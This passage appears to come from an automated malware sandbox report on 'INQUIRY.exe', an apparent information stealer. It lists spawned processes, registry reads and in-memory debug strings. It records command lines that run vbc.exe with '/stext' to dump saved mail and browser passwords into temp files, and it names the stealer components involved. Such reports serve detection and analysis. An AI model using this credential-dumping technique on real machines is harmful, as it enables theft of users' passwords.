                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2100
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe' 2 1364 5460187
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2284
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\INQUIRY.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Users\user\Desktop\INQUIRY.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                    Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbE source: INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdbi source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: fltLib.pdb1 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdbee source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.698848743.00000000049D4000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.777673272.0000000002E84000.00000004.00000001.sdmp
                    Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: NapiNSP.pdbJhgiX source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasapi32.pdb$hAi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: NapiNSP.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.711844278.0000000004EE0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793745442.0000000005270000.00000004.00000040.sdmp
                    Source: Binary string: profapi.pdb/ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.698202871.0000000002BC1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776011928.0000000002E7E000.00000004.00000001.sdmp
                    Source: Binary string: profapi.pdbkRi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cryptsp.pdb6hSi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winnsi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: secur32.pdb] source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\mscorlib.pdbd source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: winrnr.pdbo source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.711844278.0000000004EE0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793745442.0000000005270000.00000004.00000040.sdmp
                    Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cordacwks.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: schannel.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wuser32.pdbqa{ source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.699952597.0000000002BCD000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776039564.0000000002E8A000.00000004.00000001.sdmp
                    Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: INQUIRY.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp
                    Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: sxs.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rtutils.pdb? source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscoree.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: psapi.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdbxi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Z[zTs5.pdb6 source: INQUIRY.exe, 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp
                    Source: Binary string: cordacwks.pdb^hkiY source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdb@hmi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: schannel.pdbG source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: shlwapi.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\binaries.x86ret\bin\i386\bbt\opt\bin\i386\diasymreader.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nsi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: powrprof.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wwin32u.pdb) source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: security.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: dnsapi.pdb{ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdbLhYiL source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msasn1.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbo source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp
                    Source: Binary string: sechost.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: DWrite.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Drawing.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Management.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: version.pdb7 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000009.00000003.698225687.0000000002BC7000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.777673272.0000000002E84000.00000004.00000001.sdmp
                    Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: secur32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb9 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ole32.pdb&kpir source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: mscoreei.pdb(kji source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: pnrpnsp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cordacwks.pdb# source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: .pdb* source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: secur32.pdbvi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdb5 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: fltLib.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msasn1.pdb! source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbe source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: shell32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcr80.i386.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: DWrite.pdbq source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb.h;i source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasadhlp.pdb"hOi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winhttp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorsec.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmiutils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorwks.pdb% source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbH source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: rtutils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000009.00000003.698202871.0000000002BC1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776011928.0000000002E7E000.00000004.00000001.sdmp
                    Source: Binary string: mscorwks.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: oleaut32.pdb8hUi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: profapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\binaries.x86ret\bin\i386\Microsoft.VisualBasic.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorjit.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: shfolder.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: culture.pdbe source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: WMINet_Utils.pdb_ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasman.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: fastprox.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemsvc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winrnr.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msctf.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: System.Runtime.Remoting.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: version.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wintrust.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorrc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb- source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmiutils.pdbbi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: psapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: WMINet_Utils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
